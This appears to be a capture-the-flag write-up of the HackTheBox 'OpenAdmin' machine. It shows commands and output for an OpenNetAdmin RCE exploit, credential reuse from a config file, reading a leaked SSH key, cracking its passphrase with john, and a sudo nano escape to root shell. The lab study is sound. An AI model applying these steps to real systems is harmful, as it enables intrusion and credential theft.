<disclaimer>This is an old post that was finished some time ago (February 2020), but for various reasons (I forgot about the machine being retired) I'm publishing it only now.</disclaimer>

It’s been a looooong time…

… since I've written something here. This place is not dead yet. I had a really tight schedule with my security job, school, CTFs and organizing PozSec meetups, soooo it was really hard to start blogging again. I'm still learning, so some topics I want to cover in depth require some time. But here I am with a pretty easy challenge from HTB. It is my first HTB writeup and I cannot wait to publish it! But I have to wait for the embargo to expire.


Recon

First things first. The box is located at 10.10.10.171. I've added an entry to /etc/hosts to resolve it by domain name.

10.10.10.171	openadmin.htb

Nmap scan didn’t show anything interesting:

sudo nmap -T aggressive -sC -sV  10.10.10.171 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 01:32 CET
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds

Recon with the -p- option gave nothing new. A standard ssh service and a single http server running on port 80. HTB is not about bruteforcing, so without an initial foothold trying to leak users with the OpenSSH username enumeration exploit is a rather bad idea. The next part of the recon was running gobuster on the / directory.

 gobuster dir -u 10.10.10.171 -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml

The tool has found some pages on the host:

artwork
music
sierra

And some forbidden_403_not_so_interesting_stuff (looked like rules that deny access to .htaccess etc.). A recursive search on the directories found gave some files, but nothing particularly important.

 gobuster dir -u 10.10.10.171/artwork -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
 gobuster dir -u 10.10.10.171/music -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
 gobuster dir -u 10.10.10.171/sierra -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml

At this point, after analysing the content of the hosted files, I had a really hard time. Nothing to see here, but there must have been something…

In the meantime I've tried to enumerate ssh users using CVE-2018-15473, since OpenSSH 7.6p1 is affected, but that was a dead end with false positives only. After changing the method in msf no results were returned. Another tool also failed.

Stuck

Sometimes during a pentest it is really nice to have a collection of all the hyperlinks on the website. Probably there will be something interesting. I've written a simple and really fast crawler to achieve that. Here is the most important part of the generated report.

[...]

=== REPORT ===
=== IN WEBSITE LINKS ===
+-----------------------------------------+-----------------------------------------+
| source                                  | target                                  |
+=========================================+=========================================+
| http://10.10.10.171/music/contact.html  | http://10.10.10.171/music/blog.html     |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/playlist.html | http://10.10.10.171/music/blog.html     |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/artist.html   | http://10.10.10.171/music/category.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/index.html    | http://10.10.10.171/ona                 | <- this entry
+-----------------------------------------+-----------------------------------------+

[...]

It's a real pity that this wasn't found by the popular wordlists for dirbusting. But well, yeah. Back on track.
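A same-site link crawler of the kind described above, added here as an example (it is not the author's crawler). It walks an in-memory map of constructed sample pages instead of fetching over the network, so it runs offline; the page contents and the /ona link are made up to mirror the report, and fetch_page() is the one function to swap for an HTTP client. The point it demonstrates is why the report caught /ona when wordlists did not: a link target is recorded as an edge whether or not the crawler can fetch it.

```python
"""Minimal same-site link crawler (example, not the author's tool)."""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, urldefrag

# Constructed sample site, loosely modelled on the /music pages in the report.
# index.html links to /ona, which common wordlists would never guess.
SAMPLE_SITE = {
    "http://10.10.10.171/music/index.html":
        '<a href="blog.html">Blog</a> <a href="/ona">Admin</a>'
        ' <a href="https://twitter.com/x">ext</a> <a href="#top">top</a>',
    "http://10.10.10.171/music/blog.html":
        '<a href="category.html">Cat</a> <a href="index.html">Home</a>',
    "http://10.10.10.171/music/category.html":
        '<a href="../artwork/">Art</a>',
    "http://10.10.10.171/ona": '<a href="/ona/login.php">Login</a>',
}


class LinkExtractor(HTMLParser):
    """Collect href/src/action targets from the tags that carry links."""
    ATTRS = {"a": "href", "link": "href", "script": "src",
             "img": "src", "iframe": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        want = self.ATTRS.get(tag)
        if want is None:
            return
        for name, value in attrs:
            if name == want and value:
                self.links.append(value)


def fetch_page(url):
    """Offline stand-in for an HTTP GET; returns HTML or None if unknown."""
    return SAMPLE_SITE.get(url)


def crawl(start_url, max_pages=500):
    """Breadth-first crawl of same-host links starting at start_url.

    Returns (edges, external): edges is a sorted list of (source, target)
    pairs inside the site, external the sorted list of off-host targets.
    A target is recorded even when it cannot be fetched, so dead or
    unguessable paths still show up in the report.
    """
    host = urlparse(start_url).netloc
    seen = {start_url}
    queue = deque([start_url])
    edges, external = set(), set()
    while queue and len(seen) <= max_pages:
        url = queue.popleft()
        html = fetch_page(url)
        if html is None:
            continue
        parser = LinkExtractor()
        parser.feed(html)
        for raw in parser.links:
            target, _fragment = urldefrag(urljoin(url, raw))
            if target == url:
                continue  # in-page anchors such as "#top"
            if urlparse(target).netloc != host:
                external.add(target)
                continue
            edges.add((url, target))
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return sorted(edges), sorted(external)


def report(edges):
    """Render the edge list as a plain-text source/target table."""
    w1 = max(len(s) for s, _ in edges)
    w2 = max(len(t) for _, t in edges)
    sep = "+" + "-" * (w1 + 2) + "+" + "-" * (w2 + 2) + "+"
    lines = [sep, f"| {'source':<{w1}} | {'target':<{w2}} |", sep.replace("-", "=")]
    for s, t in edges:
        lines.append(f"| {s:<{w1}} | {t:<{w2}} |")
        lines.append(sep)
    return "\n".join(lines)


if __name__ == "__main__":
    found, offsite = crawl("http://10.10.10.171/music/index.html")
    print(report(found))
    print("external:", offsite)
```

Scope is kept to one host on purpose: following off-site links during an engagement drags third parties into the test, so they are only listed.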

Local shell

/ona redirected to OpenNetAdmin 18.1.1, a tool for managing the inventory of your network. This version is vulnerable to RCE and a PoC was published. Unfortunately the .sh script hasn't worked for me. Finally I've found the right exploit, which gave a really simple shell as the www-data user.

> python ona-rce.py exploit http://10.10.10.171/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$

Poking around

The next stage of the enumeration involved looking around to obtain a real shell, probably ssh to the machine. At this time I've decided not to create any more complicated shell with, for example, a python tty. I just looked around for available stuff.

sh$ ls -la
total 88
drwxrwxr-x 10 www-data www-data  4096 Feb 20 20:33 .
drwxr-x---  7 www-data www-data  4096 Nov 21 18:23 ..
-rw-rw-r--  1 www-data www-data  1970 Jan  3  2018 .htaccess.example
-rw-r--r--  1 www-data www-data 16384 Feb 20 20:33 .login.php.swp
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data  1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data  4160 Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data  4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data  1999 Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data  4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data  4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data  1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 workspace_plugins

Grepping directories and searching for a password led to the local/config directory.

sh$ ls -la local
total 20
drwxrwxr-x  5 www-data www-data 4096 Jan  3  2018 .
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 ..
drwxrwxr-x  2 www-data www-data 4096 Nov 21 16:51 config
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 nmap_scans
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 plugins

With database_settings.inc.php in it.

sh$ ls -la local/config
total 16
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .
drwxrwxr-x 5 www-data www-data 4096 Jan  3  2018 ..
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php
-rw-rw-r-- 1 www-data www-data 1201 Jan  3  2018 motd.txt.example
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer

A further look at that file gave some really interesting results.

sh$ cat local/config/database_settings.inc.php

MySQL creds lying around.

[...]
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,

[...]
))

I've tried listing users on the box. I did it simply by checking the home directories on the host.

sh$ ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .
drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna

Attempted some kind of password spraying attack. Got three accounts on the host (with root) and one password, and after one try I've managed to log in! Remember, users: never ever reuse your passwords.

ssh jimmy@10.10.10.171 
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 20 20:53:53 UTC 2020

  System load:  0.24              Processes:             118
  Usage of /:   50.8% of 7.81GB   Users logged in:       0
  Memory usage: 27%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls

Looked like the first shell had been spawned. But no user.txt file was there. Needed to look deeper.

Privilege escalation

It was time to do some priv esc. Firstly to obtain access to joanna's home directory, then root.

Horizontal

In general there are two types of privilege escalation. Horizontal means trying to get access to other users that are not power users like root. But they may belong to different groups and have read and write rights to some interesting locations. My obvious choice was to target joanna's account.

jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile
jimmy@openadmin:~$ cat .bash_history
jimmy@openadmin:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jimmy@openadmin:~$ sudo !!
sudo cat /etc/shadow
[sudo] password for jimmy: 
jimmy is not in the sudoers file.  This incident will be reported.
jimmy@openadmin:~$ w
 20:54:54 up  1:59,  1 user,  load average: 0.09, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/0    10.10.14.7       20:53    0.00s  0.05s  0.00s w

I've run the LinEnum.sh script but found nothing unusual. My main focus turned to the /var/www directory. There was an internal directory exposed by the Apache server on port 52846, bound to localhost only.

jimmy@openadmin:/var$ cat /etc/apache2/sites-enabled/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

And AssignUserID was set to joanna, so with mpm_itk the PHP under that vhost runs with joanna's privileges.
The directory presented three .php files, one of which was particularly interesting.

jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php

The main.php source code presented below had a shell_exec('cat /home/joanna/.ssh/id_rsa') call. This should cat (and then embed) the private RSA key of user joanna in the visited website. Note that the session check only sends a Location header and never calls exit, so the rest of the script still runs for an unauthenticated request.

jimmy@openadmin:/var$ cat www/internal/main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Tried to request main.php on the right port and got a pretty meaningful response: a 302 redirect whose body still contains the key.

jimmy@openadmin:/var$ curl -ksi 127.0.0.1:52846/main.php
HTTP/1.1 302 Found
Date: Thu, 20 Feb 2020 21:42:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=uk2vqsqf0o2kmdghf9vakc87dj; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /index.php
Content-Length: 1902
Content-Type: text/html; charset=UTF-8
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

[...]
-----END RSA PRIVATE KEY-----

</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
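A check a defender can run over responses like the one above, added as an example (not the author's code): parse a raw HTTP response and flag PEM private-key blocks in the body, including the "redirect with a body" shape that main.php produces because header("Location: ...") is not followed by exit(). The sample response is constructed and the key data in it is a placeholder, not a real key; the DEK-Info value is invented for the sample.

```python
"""Flag private-key material leaking in HTTP responses (example code)."""
import re

# Constructed sample response modelled on the writeup's curl output.
# The key body is placeholder text, not real key material.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Location: /index.php\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<pre>-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "PLACEHOLDERKEYDATAPLACEHOLDERKEYDATAPLACEHOLDER\n"
    "-----END RSA PRIVATE KEY-----\n"
    "</pre><html><h3>Don't forget your \"ninja\" password</h3></html>"
)

# Matches RSA/EC/OPENSSH/PKCS#8 PEM blocks; \1 ties END to the same label.
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.S)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def find_private_keys(body):
    """Return one dict per PEM private key found in the body."""
    found = []
    for match in PEM_RE.finditer(body):
        label, inner = match.group(1), match.group(2)
        # Legacy PEM encryption is signalled by Proc-Type/DEK-Info headers.
        encrypted = "Proc-Type: 4,ENCRYPTED" in inner
        dek = re.search(r"DEK-Info: ([^,\n]+)", inner)
        found.append({
            "type": label,
            "encrypted": encrypted,
            "cipher": dek.group(1) if dek else None,
        })
    return found


def assess(raw):
    """Summarise what a response leaks and whether a redirect carried a body."""
    status, headers, body = parse_response(raw)
    return {
        "status": status,
        "location": headers.get("location"),
        "redirect_with_body": 300 <= status < 400 and bool(body.strip()),
        "keys": find_private_keys(body),
    }


if __name__ == "__main__":
    result = assess(SAMPLE_RESPONSE)
    print(result)
```

A redirect that still carries content is worth alerting on by itself; the fix on the application side is to exit right after the header() call, and to never have a web process read a private key file at all.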

But as presented above the private key was encrypted. There was a hint to remember the ninja password. I didn't remember any, so I downloaded the john toolkit and the rockyou.txt dictionary for the beginning.

~/devp/htb/openadmin ❯ ssh2john things.key > joanna.hash
~/devp/htb/openadmin ❯ john joanna.hash -wordlist=/home/rav/tools/SecLists/rockyou.txt 
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna_ssh.key)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:03 DONE (2020-02-20 23:59) 0.2570g/s 3686Kp/s 3686Kc/s 3686KC/s *7¡Vamos!
Session completed

Two seconds later john cracked the password: bloodninjas. I've used it in combination with the key and finally logged in as joanna! Got the user.txt file. So this part of the challenge was done.

~/devp/htb/openadmin ❯ ssh -i things.key joanna@10.10.10.171
Enter passphrase for key 'things.key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 20 22:04:05 UTC 2020

  System load:  0.0               Processes:             124
  Usage of /:   51.2% of 7.81GB   Users logged in:       1
  Memory usage: 35%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3

joanna@openadmin:~$ ls -la
total 332
drwxr-x--- 6 joanna joanna   4096 Feb 20 22:22 .
drwxr-xr-x 4 root   root     4096 Nov 22 18:00 ..
lrwxrwxrwx 1 joanna joanna      9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna    220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna   3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna   4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna   4096 Nov 22 22:42 .gnupg
-rwxrwxr-x 1 joanna joanna  46632 Feb 20 22:08 linenum.sh
drwxrwxr-x 3 joanna joanna   4096 Nov 22 18:53 .local
-rwxrwxr-x 1 joanna joanna  34317 Feb 20 22:09 lse.sh
-rw------- 1 joanna joanna      8 Feb 20 22:22 nano.save
-rw-r--r-- 1 joanna joanna    807 Nov 22 18:00 .profile
-rw-rw-r-- 1 joanna joanna 204173 Feb 20 22:17 report.txt-20-02-20
drwx------ 2 joanna joanna   4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna     33 Nov 28 09:37 user.txt
-rw------- 1 joanna joanna   1689 Feb 20 22:09 .viminfo
joanna@openadmin:~$ wc -c user.txt 
33 user.txt

I've uploaded the LinEnum.sh and lse.sh scripts for vertical privilege escalation. Both scripts found that user joanna can run /bin/nano /opt/priv with sudo and without a password.

Vertical

GTFOBins (this entry is particularly for nano, but there are other awesome ones too) are snippets for spawning a shell from many binaries available on GNU/Linux machines. This time one of the methods worked for me and allowed spawning a root shell.

nano
^R^X
reset; sh 1>&0 2>&0

And here is the dump of commands used as root. I haven't tried to create a more reliable shell since I only wanted to gather the output of the root.txt file.

Command to execute: reset; sh 1>&0 2>&0
# whoami
root
# cat /root.txt                                           M-F New Buffer
cat: /root.txt: No such file or directory
# ls
linenum.sh  lse.sh  nano.save  report.txt-20-02-20  user.txt
# cd ~
# ls
linenum.sh  lse.sh  nano.save  report.txt-20-02-20  user.txt
# ls /
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
# ls /root
root.txt
# cat /root/tx
cat: /root/tx: No such file or directory
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561
# wc -l /root/root.txt
1 /root/root.txt
# wc -c /root/root.txt
33 /root/root.txt

Which was successful.

Bottom line

I've really enjoyed this box. The OpenAdmin challenge was a little bit tricky and all about enumeration. Nothing fancy and no binary exploitation here. But I've learned one more time that sometimes the provided tools are not reliable.

Thank you for reading and see ya next time!

foxtrot_charlie over and out!